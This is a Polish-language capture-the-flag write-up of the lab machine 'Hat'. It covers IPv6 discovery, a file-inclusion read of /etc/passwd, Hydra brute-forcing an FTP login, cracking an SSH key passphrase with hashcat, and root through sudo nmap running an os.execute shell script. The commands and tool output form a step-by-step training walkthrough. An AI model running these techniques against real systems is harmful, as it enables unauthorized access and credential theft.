Hat by D4t4s3c
Write-up is in Polish language.
00. Metainfo
Nazwa: | Hat |
Autor: | D4t4s3c |
Wypuszczony: | 2021-09-30 |
Do ściągnięcia: | vulnyx |
Poziom: | Średni |
System: | Linux |
Nauczysz się: | IPv6, Kryptografia, Fuzzing, Gtfobins |
01. Wstęp
Hat jest podstępną, za to świetną maszyną, na którą można stracić dużo czasu. Ale jak mówił Sherlock Holmes. “Gdy odrzucisz to, co niemożliwe, wszystko pozostałe, choćby najbardziej nieprawdopodobne, musi być prawdą.” Te powiedzenie sprawdza się i tutaj. A o co chodzi? Nie będę was trzymał w niepewności. Tak, chodzi o IPv6. Ile czasu straciłem na to, żeby to rozwiązać. Nauczyłem się przy okazji dużo nowych rzeczy, chociaż i tak sam tego nie rozwiązałem. Za to dzięki solucji Nepcodex wszystko stało się jasne.
02. Ustalanie IP maszyny
Najpierw sprawdźmy IP maszyny, jaką ma w IPv4. Zapiszmy też sobie adres fizyczny, czyli potocznie adres MAC. to będzie ważne przy ustalaniu adresu IPv6 atakowanej wirtualki:
# netdiscover -i eth0 -r 172.16.1.0/24
...
172.16.1.166 f2:73:39:62:4e:7e 1 42 Unknown vendor
...
Mamy IPv4 i adres MAC, teraz ustalmy jak to wygląda w IPv6. Najpierw sprawdźmy nasz adres IPv6:
# root@kali:/home/szikers# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether b2:46:e6:c8:fb:59 brd ff:ff:ff:ff:ff:ff
inet 172.16.1.10/24 brd 172.16.1.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fda4:6a57:e20b:0:b046:e6ff:fec8:fb59/64 scope global dynamic mngtmpaddr
valid_lft forever preferred_lft forever
inet6 fe80::b046:e6ff:fec8:fb59/64 scope link
valid_lft forever preferred_lft forever
W IPv6 prefiks zaczynający się od fe80 oznacza sieć lokalną. Zauważmy, że trzy ostatnie bajty naszej karty sieciowej są tożsame z ostatnimi bajtami IPv6. Dzięki tej obserwacji zazwyczaj można znaleźć konkretny komputer, który znajduje się w sieci. Jak nie, to trzeba dalej analizować adres MAC, (ale nie będę już tego opisywał) Na lokalnym komputerze wykonajmy poniższą komendę:
# root@kali:/home/szikers# ping6 ff02::1 | grep 62:4e7e
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=1 ttl=64 time=0.873 ms
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=2 ttl=64 time=0.451 ms
To jest właśnie nasza poszukiwana maszyna. Spingujmy ją; można komendą ping lub ping6.
# root@kali:/home/szikers# ping6 fe80::f073:39ff:fe62:4e7e%eth0
PING fe80::f073:39ff:fe62:4e7e%eth0(fe80::f073:39ff:fe62:4e7e%eth0) 56 data bytes
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=1 ttl=64 time=0.361 ms
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=2 ttl=64 time=0.414 ms
03. Enumeracja portów
Tak wygląda skanowanie IPv6:
msf6 > db_nmap -6 fe80::f073:39ff:fe62:4e7e%eth0
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 20:08 CEST
[*] Nmap: Nmap scan report for fe80::f073:39ff:fe62:4e7e
[*] Nmap: Host is up (0.00036s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: F2:73:39:62:4E:7E (Unknown)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Ale po co do tego używać IPv6? Przecież IPv4 jest łatwiejsze i prostsze w obsłudze - zapytacie. Zaraz wyjaśnię, ale wpierw zeskanuję Nmapem zwykłe IPv4.
msf6 > db_nmap -A -p- 172.16.1.166
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 22:12 CEST
[*] Nmap: Nmap scan report for Hat.lan (172.16.1.166)
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp filtered ssh
[*] Nmap: 80/tcp open http Apache httpd 2.4.38 ((Debian))
[*] Nmap: |_http-server-header: Apache/2.4.38 (Debian)
[*] Nmap: |_http-title: Apache2 Debian Default Page: It works
[*] Nmap: 65535/tcp open ftp pyftpdlib 1.5.4
[*] Nmap: | ftp-syst:
[*] Nmap: | STAT:
[*] Nmap: | FTP server status:
[*] Nmap: | Connected to: 172.16.1.166:65535
[*] Nmap: | Waiting for username.
[*] Nmap: | TYPE: ASCII; STRUcture: File; MODE: Stream
[*] Nmap: | Data connection closed.
[*] Nmap: |_End of status.
[*] Nmap: MAC Address: F2:73:39:62:4E:7E (Unknown)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 4.X|5.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
[*] Nmap: OS details: Linux 4.15 - 5.6
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.42 ms Hat.lan (172.16.1.166)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.05 seconds
msf6 >
Jak widzicie port 22 jest filtrowany. Na początku myślałem, że Knockd go blokował, ale to nie było to. To podstępny IPv6 Dochodzi nam jeszcze port 65535, na którym jest jakiś FTP.
04. WWW i [fe80::f073:39ff:fe62:4e7e]
Port 80 też jest otwarty, wejdźmy na stronę poprzez IPv6 wpisując http://[fe80::f073:39ff:fe62:4e7e]
jak widzimy, jest to zwykła strona Debiana. Chciałem poffuzować trochę w IPv6. Myślałem, że Feroxbuster to wspiera. Jednak na razie to nie działa. Skanowałem standardowo IPv4.
05. Feroxbuster i FFuf
Poszukajmy ukrytych plików:
# root@kali:/home/szikers/dc-6# feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://172.16.1.166 -x php log
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.16.1.166
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php, log]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 311c http://172.16.1.166/logs
301 9l 28w 318c http://172.16.1.166/php-scripts
200 0l 0w 0c http://172.16.1.166/php-scripts/file.php
200 26l 198w 1834c http://172.16.1.166/logs/vsftpd.log
403 9l 28w 277c http://172.16.1.166/server-status
[####################] - 4m 1868652/1868652 0s found:5 errors:0
[####################] - 4m 622884/622884 2539/s http://172.16.1.166
[####################] - 4m 622884/622884 2497/s http://172.16.1.166/logs
[####################] - 3m 622884/622884 2636/s http://172.16.1.166/php-scripts
Użyłem tutaj do wyszukiwania rozszerzeń .php i .log, bo już wcześniej wiedziałem czego mam szukać. http://172.16.1.166/php-scripts/file.php
sugeruje nam parametr do file. Teraz poffuzujmy Ffufem.
# root@kali:/# ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.16.1.166/php-scripts/file.php?FUZZ=/etc/passwd -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://172.16.1.166/php-scripts/file.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
________________________________________________
6 [Status: 200, Size: 1452, Words: 13, Lines: 28]
:: Progress: [4686/4686] :: Job [1/1] :: 60 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Parametrem do file jest 6. Skoro już to wiemy, to możemy podejrzeć zawartość /etc/passwd:
http://172.16.1.166/php-scripts/file.php?6=/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534: :/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
Widać użytkownika cromiphi. Ta informacja się nam potem przyda. Za to vsftpd.log zawiera:
http://172.16.1.166/logs/vsftpd.log
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<< [I 2021-09-28 18:43:57] concurrency model: async [I 2021-09-28 18:43:57] masquerade (NAT) address: None [I 2021-09-28 18:43:57] passive ports: None [I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect) [I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49296-[] USER 'sml' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect). [I 2021-09-28 18:44:09] 192.168.1.83:49280-[ftp_s3cr3t] USER 'ftp_s3cr3t' logged in. [I 2021-09-28 18:44:09] 192.168.1.83:49280-[ftp_s3cr3t] FTP session closed (disconnect). [I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
06. Pyftpdlib
ftp_s3cr3t jest loginem na FTP na 65535 porcie. Najpierw myślałem, że Pyftpdlib jest podatny na włamanie, jednak nie. Do uzyskania hasła niestety trzeba użyć metody siłowej.
# hydra -t64 -T64 -s 65535 -V -P /usr/share/wordlists/rockyou.txt -l ftp_s3cr3t ftp://172.16.1.166
ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "chinita" - 1071 of 14344399 [child 46] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "alexandru" - 1072 of 14344399 [child 47] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "mihaela" - 1073 of 14344399 [child 48] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "trisha" - 1074 of 14344399 [child 49] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "mitchell" - 1075 of 14344399 [child 50] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "love4ever" - 1076 of 14344399 [child 51] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "1234" - 1077 of 14344399 [child 52] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "shane" - 1078 of 14344399 [child 53] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "bulldog" - 1079 of 14344399 [child 54] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "brownie" - 1080 of 14344399 [child 55] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "thuglife" - 1081 of 14344399 [child 56] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "amormio" - 1082 of 14344399 [child 57] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "margaret" - 1083 of 14344399 [child 58] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "calvin" - 1084 of 14344399 [child 59] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "aquarius" - 1085 of 14344399 [child 60] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "phillip" - 1086 of 14344399 [child 61] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "kitty1" - 1087 of 14344399 [child 62] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "morena" - 1088 of 14344399 [child 63] (0/0)
[65535][ftp] host: 172.16.1.166 login: ftp_s3cr3t password: cowboy
v1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-30 21:51:35
Hydra znalazł nam hasło: cowboy. Wchodzimy na FTP i ściągamy klucz:
# root@kali:~# ncftp
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
ncftp> open -u ftp_s3cr3t -P 65535 172.16.1.166
Connecting to 172.16.1.166...
pyftpdlib 1.5.4 ready.
Logging in...
Password requested by 172.16.1.166 for user "ftp_s3cr3t".
Username ok, send password.
Password: ******
Login successful.
Logged in to 172.16.1.166.
ncftp / > ls
ftp_s3cret_share/
ncftp / > cd ftp_s3cret_share/
ncftp /ftp_s3cret_share > ls
id_rsa note
ncftp /ftp_s3cret_share > cat note
Hi,
We have successfully secured some of our most critical protocols ... no more worrying!
Sysadmin
ncftp /ftp_s3cret_share > get id_rsa
id_rsa: 1.71 kB 90.32 kB/s
ncftp /ftp_s3cret_share >
id_rsa jest zakodowany. Użyjmy komendy ssh2john i hashcat.exe (Windows), żeby go rozkodować:
# ssh2john.py id_rsa > id_rsa.dec
c:\temp\hashcat-6.2.3>hashcat.exe -O -m22911 -a0 crack\id_rsa.dec rockyou.txt --show
$sshng$0$8$6f30b7b22b088ab2$1200$2662c9a88e26f6393531cac8ccd172b98acfc8fbb7667c3a6b0bb21082b465cb6061a6e3364e4c542334147e394900a5aea2b742a4800a23aae3e0e7316ac40a3e423be24fcc68c8ba9833f08ad6d02afb9a445235af5f09e101ac8cc08bddb818433bd8f32ec2504ce3358367ff7ada0b59a439f35d82dcf6661d5537beb9b23636b542e9dd9a9352f918cb01758c220558fc6e19d4b2be1da178b565c4406681d4b1eb3f67ca217cd5e45280ced9dd64426884d210151149c17abcd5f84f381a92450601e985ba06f44f91dc6876eef88cde9634a85bd4fcf59b4c9f18e8b8128093cc2e576512e044ca6d0b3c3a5cdbb2fbc1d2846300a33d6046b6e1a72ac75f95e41fb322a28c7f3f603947d21b2b0dcf3764c703475de3b5f65b6631d923055d854b8a747a7a220e259b18b546a240df9083e991c733338a966d538d0b240348fa8dd3de277a3979b87fcf7a1eb6bdc52846b0cfed8a41af825fe7eb0b037facb15473c30ebe1ec8e3f8c9f68da474a074bb93871fea605df9a14c9ce59954aa3adb62edcc5e7d46f5e36265b64bb990497029dbd5107c3eaa664d330af0f8abfbae5a6f7b37ec5b8bb39bc25e9e59b15e8325eb667714a3e329aac4a99adb3ba6c77fa956008ac98091b27519f5b690ff218d432592b06b468bae46ebee1bbc0b42d2a4855dcb965449a4f4e192ff141c43411edc836fd9605e4a735a6f2208d7ae512c6db48f0f28366cb2167823119debefb134bc979e6a52f43618eef790731c59f900b2f51aa232e24b15c64dc77e80f7fa9178b04dbcf6c1b4d128fcc3c0a6939fbe325bef6373cf3ee83f02753e8eacdfb678ff0ad2e91d37032a55cf8c6a0d1338e0b0abe4157cac1f3bb03edfed77c63532d7f4ca4482435ee84bf3c443af303b538bb2f590d812ae73d8755cdda82a9c73013f89369f4284bb662808d3a9e764386292a85e8cf93a3c3c0ae50884daa88a587fd23fa091d8083b98cc004053ee9e8cfdf9e17c7a5e54d0a299225f4e32c2538f537b3d077830c2b84e281bfbd286333479b64730c59363cbd539a473e0ab5cc7ddfc2699e3fe3f59d0d1001142362126461832d2fced1f87237d96c97552b636c91dcd9d781b5f76248d62c33380bc9964827a3a655e159251896df17f376ad9547d3727f7b41519e257be5261054ad812db131e30dcda5b07dca40d62da5c9108b3a5cc966b126321e5a123e7aa588570b174f1288da121ae97b9876350fedcbac0da77ea54a3563b874c13c0b3f5298b645eb9b7b04bc1f17da65fab4707ed623baed42a315d67b4e2d50d9763acc209b3a5dd2e5bdb830500500d0d8824af542d810aac8feb52aeb775c8e9f801e33a49dc8b755c4a401636b34fbd76f2e66892c7f4e39d5741b823859c32eba6e3458ccd7adf7c100c221ec697494458f3ab3ed3b1ad023efa4025cb33532b5a314af75cfdfdf44ce0788461fcc94dc42b3461fd04da7c791c28ff55ed8d312b0ae0db22ee5ac152b784271546446d5fb00eada2f4daafae260ec526b6a9aacf3f4e05559469e7161d48659d32e3c54c401a33eebbc11df7cf39582af9c4984f424479c0a95a6a1c5b8d9a0603f92dca8735b75f5037ce57e559a708074ea9fdc5c2af7c3a5cda9ad32d93b0d9ae4f6211e895fe42beaeb0d5784162ff272cb2e1d135a011ba:ilovemyself
Hasłem do klucza jest ilovemyself. Usuńmy je i nadajmy odpowiednie uprawnienia dla id_rsa.out:
# openssl rsa -in id_rsa -out id_rsa.out
# chown 600 id_rsa.out
07. SSH IPv6
Klucz usunęliśmy po to, żeby nie wpisywać hasła przy logowaniu. Teraz możemy od razu wejść na Shella. Pamiętajcie, żeby na końcu adresu IPv6 była dopisana sieciówka. W moim wypadku to jest %eth0.
# root@kali:/home/szikers/hat# ssh -i id_rsa.out -6 cromiphi@fe80::f073:39ff:fe62:4e7e%eth0
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@Hat:~$
08. root
Konto root to jest już drobnostka, akurat ostatnio w DC-6 było identyczne rozwiązanie. Jak uzyskać większy dostęp przez Sudo na różne programy możesz zobaczyć na gtfobins. Niestety, po wejściu na roota nie widać co piszemy.
# cromiphi@Hat:~$ sudo -l
Matching Defaults entries for cromiphi on Hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cromiphi may run the following commands on Hat:
(root) NOPASSWD: /usr/bin/nmap
# cromiphi@Hat:~$ echo "os.execute('/bin/sh')">/tmp/root.nse
# cromiphi@Hat:~$ sudo nmap --script=/tmp/root.nse
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-08 23:50 CEST
# root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
09. Koniec
Z tą wirtualką miałem dosyć dużo problemów (IPv6), ale człowiek się cały czas uczy. Jeżeli podobał się wpis, znalazłeś jakiś błąd napisz mejla na kerszi@protonmail.com.
Zostaw komentarz